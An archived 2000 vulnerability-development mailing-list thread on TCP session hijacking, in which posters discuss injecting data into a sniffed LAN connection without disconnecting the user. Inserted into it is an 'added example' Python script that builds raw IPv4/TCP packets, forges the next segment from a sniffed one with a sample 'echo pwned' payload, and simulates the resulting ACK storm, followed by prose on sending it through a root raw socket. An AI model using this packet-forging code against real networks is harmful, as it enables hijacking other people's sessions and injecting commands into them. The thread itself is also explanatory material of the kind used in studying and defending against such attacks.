Vulnerability Development mailing list archives
Re: Forge packets ?
From: "Samy Kamkar [CommPort5]" <CommPort5 () LUCIDX COM>
Date: Tue, 12 Sep 2000 23:27:26 +0100
That sounds right, but as originally asked, can we send some data without disrupting anything...let's think about this situation. We're assuming that the remote host will take packets with incorrect sequence numbers, etc. and throw them away (I doubt there's much else it would want to do with those packets.) See below and maybe you'll see how it can be done without disrupting anything:

spoofed == us, local == the local user, remote == remote host...

spoofed-local > remote: <data> (here is what you want sent, but now local is out of sync)
spoofed-remote > local: <data> (this is just here to get local to synchronize with our 'half-hijack'...we hope this will trigger local to send some stuff back to 'remote' and synchronize like that)
local > remote: ack/<data> (this is discarded at remote since remote already got its data)
remote > local: ack

So here you (being the spoofed packets) send some data to the remote host and send some data to the local user. Assuming you put in some data (of course this isn't always possible, but should be able to be done) that gets local to send ack or data to remote [it will have an incorrect sequence number now], remote will ignore it since it doesn't belong anywhere. Remote will also send an ack back saying 'I heard your packet [the spoofed one]' so local sees everything normally and so does remote.

Probably difficult but it should be able to be done.

George Gales wrote:
Hijacking normally involves knocking the original local user off the net one way or another. I don't believe there's a way to hijack without causing a disconnect without doing that.

Assuming the hijacker was able to impersonate the local user (monitor their traffic, then inject spoofed packets with the right sequence numbers), the original user would still get disconnected.

The cause is that, while the hijacker is sniffing the net to monitor the local user's traffic (and adjusting its sequence numbers to make things work), the original local user isn't sniffing, and won't adjust his sequence numbers to take into account the hijacker's traffic.

As soon as the original local user communicates with the remote end (either direction), the receiving end would notice the incorrect sequence numbers, and things would go down the tubes (probably generate a RST and close the connection).

If I'm wrong, please somebody explain...

-Simon
george_gales () non agilent com

-----Original Message-----
From: Samy Kamkar [CommPort5] [mailto:CommPort5 () LUCIDX COM]
Sent: Monday, September 11, 2000 4:29 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: Forge packets ?

Just sending packets (assuming there is a connection from your lan which you're able to sniff) with data without disconnecting connections should be pretty simple. No handshakes needed since the connection will still be open from the local user...the local user will see it if (s)he sniffs the lan's packets and the remote host may echo the data which you sent, depending on the protocol.

You would need to sniff the packets which the local user is sending to the remote host and then you'll need to create a packet matching what an outgoing packet from the local user would look like (correct sequence number, window size, etc.) and send it on its way...so it is possible. There are also many programs which already 'utilize' the local-net/tcp insecurities.

Not allowing spoofed packets out (although it won't necessarily always be 'spoofed', could be from the same hostname depending on how the lan is set up) could stop it...I'm not aware of the best way to stop this from happening, or how easy it is to not allow spoofed packets out.

Skreel wrote:

So TCP hijacking is the solution ? I thought hunt could only hijack connections on port 23. What I actually want is to send data to remote host without dropping the user's connection, whether the user sees the data or not (I'm only talking theoretically), I just wanted to know if it was possible. And also if I used ipchains to IP masquerade the lan, then wouldn't it be easier for an attacker to send data and hijack the user's connection ? Is there any way to prevent this kind of attack (if it is a real attack)?
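As an added example (not code posted by anyone in this thread), the Python below does the two things the thread talks about: it builds the forged segment Samy describes, taking the 4-tuple, ack and window from a sniffed local > remote segment and advancing the sequence number past that segment's payload, and it then tracks the SND.NXT / RCV.NXT bookkeeping of the two real endpoints the way RFC 793 specifies, so the effect George describes on the unaware local user can be seen in a log. All addresses (10.0.0.5, 192.0.2.10), ports, sequence numbers and payloads are constructed sample values; the Endpoint model ignores sequence wraparound, retransmission timers and the extra checks modern stacks add.

```python
# Added example, not from the thread. Sample addresses, ports, seq/ack numbers and payloads are constructed.
import struct

FIN, SYN, PSH, ACK = 0x01, 0x02, 0x08, 0x10

def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_segment(src, dst, sport, dport, seq, ack, win, payload=b"", flags=PSH | ACK):
    """Raw IPv4 + TCP packet (no options) with valid IP and TCP checksums."""
    tcp_len = 20 + len(payload)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, win, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, 6, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0, 0x4000, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload

def parse_segment(pkt: bytes) -> dict:
    """Decode the fields a sniffer needs from a raw IPv4 + TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:struct.unpack("!H", pkt[2:4])[0]]
    sport, dport, seq, ack, off_flags, win = struct.unpack("!HHIIHH", tcp[:16])
    return {"src": pkt[12:16], "dst": pkt[16:20], "sport": sport, "dport": dport,
            "seq": seq, "ack": ack, "flags": off_flags & 0x1FF, "win": win,
            "payload": tcp[(off_flags >> 12) * 4:]}

def checksums_valid(pkt: bytes) -> bool:
    """Both checksums fold to zero when recomputed over the packet as sent."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:struct.unpack("!H", pkt[2:4])[0]]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + tcp) == 0

def forge_next(observed: bytes, payload: bytes) -> bytes:
    """The segment the local user *would* send next: same 4-tuple, ack and window,
    seq advanced past the observed payload (SYN and FIN each consume one number too)."""
    s = parse_segment(observed)
    used = len(s["payload"]) + bool(s["flags"] & SYN) + bool(s["flags"] & FIN)
    return build_segment(s["src"], s["dst"], s["sport"], s["dport"],
                         (s["seq"] + used) & 0xFFFFFFFF, s["ack"], s["win"], payload)

class Endpoint:
    """Only the SND.NXT / RCV.NXT bookkeeping of an ESTABLISHED TCP (RFC 793 section 3.9);
    sequence wraparound, retransmission and RFC 5961 challenge-ACK limits are left out."""
    def __init__(self, name, snd_nxt, rcv_nxt, rcv_wnd=8192):
        self.name, self.snd_nxt, self.rcv_nxt, self.rcv_wnd = name, snd_nxt, rcv_nxt, rcv_wnd
        self.delivered = b""           # bytes handed up to the application
    def send(self, payload=b""):
        seg = {"from": self.name, "seq": self.snd_nxt, "ack": self.rcv_nxt, "data": payload}
        self.snd_nxt += len(payload)
        return seg
    def receive(self, seg):
        """Return (verdict, reply). A segment outside the receive window, or one that ACKs
        data not yet sent, is dropped but still answered with an ACK, as RFC 793 requires."""
        lo, hi, seq, n = self.rcv_nxt, self.rcv_nxt + self.rcv_wnd, seg["seq"], len(seg["data"])
        if not (lo <= seq < hi or (n and lo <= seq + n - 1 < hi)):
            return "dropped: seq %d outside [%d, %d)" % (seq, lo, hi), self.send()
        if seg["ack"] > self.snd_nxt:
            return "dropped: ack %d beyond SND.NXT %d" % (seg["ack"], self.snd_nxt), self.send()
        new = seg["data"][max(0, lo - seq):]       # trim any already-received prefix
        self.delivered += new
        self.rcv_nxt += len(new)
        return "accepted", (self.send() if new else None)

def hijack_scenario(inject: bytes, keystroke: bytes = b"x", steps: int = 6):
    """Spoofer injects `inject` as the local user; one step later the real local user,
    unaware of it, types `keystroke`. Returns what remote delivered and a verdict log."""
    local = Endpoint("local", snd_nxt=1000, rcv_nxt=5000)
    remote = Endpoint("remote", snd_nxt=5000, rcv_nxt=1000)
    spoof = {"from": "spoofed-local", "seq": local.snd_nxt, "ack": local.rcv_nxt, "data": inject}
    queue, log = [("remote", spoof)], []
    for step in range(steps):
        if step == 1:
            queue.append(("remote", local.send(keystroke)))
        if not queue:
            break
        dest, seg = queue.pop(0)
        endpoint = remote if dest == "remote" else local
        verdict, reply = endpoint.receive(seg)
        log.append("%s > %s: %s" % (seg["from"], dest, verdict))
        if reply:
            queue.append(("local" if dest == "remote" else "remote", reply))
    return remote.delivered, log

# Constructed sample: the last segment seen going from the local user (10.0.0.5) to a
# telnet server (192.0.2.10), carrying "ls\n" at seq 1000 and acknowledging 5000.
OBSERVED = build_segment(b"\x0a\x00\x00\x05", b"\xc0\x00\x02\x0a", 40000, 23, 1000, 5000, 8192, b"ls\n")

if __name__ == "__main__":
    print(checksums_valid(forge_next(OBSERVED, b"echo pwned\n")), *hijack_scenario(b"echo pwned\n")[1], sep="\n")
```

The forged packet is what you would hand to a raw socket (SOCK_RAW with IP_HDRINCL, which needs root) on the lan; the only hard part is the sequence number, and the sniffed segment gives it to you. The scenario log shows the other half of the thread: remote accepts the injected data, and the local user's very next keystroke arrives with a sequence number that is now below remote's RCV.NXT, so remote drops it and answers with an ACK whose ack number is beyond what local has sent; local drops that and ACKs back, and the two sides keep answering each other's unacceptable segments. That exchange is the ACK storm Joncheray described in "A Simple Active Attack Against TCP" (USENIX Security 1995), and handling it is what hijacking tools like hunt spend most of their effort on.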
Current thread:
- Forge packets ? Skreel (Sep 12)
- Re: Forge packets ? Samy Kamkar [CommPort5] (Sep 12)
- Re: Forge packets ? FX, Phenoelit (Sep 21)
- <Possible follow-ups>
- Re: Forge packets ? Skreel (Sep 12)
- Re: Forge packets ? Samy Kamkar [CommPort5] (Sep 12)
- Re: Forge packets ? Michael Wojcik (Sep 12)
- Re: Forge packets ? George Gales (Sep 12)
- Re: Forge packets ? Everhart, Glenn (FUSA) (Sep 12)
- Re: Forge packets ? Samy Kamkar [CommPort5] (Sep 13)
- Re: Forge packets ? Andrew Thomas (Sep 13)
- Re: Forge packets ? Michael Wojcik (Sep 14)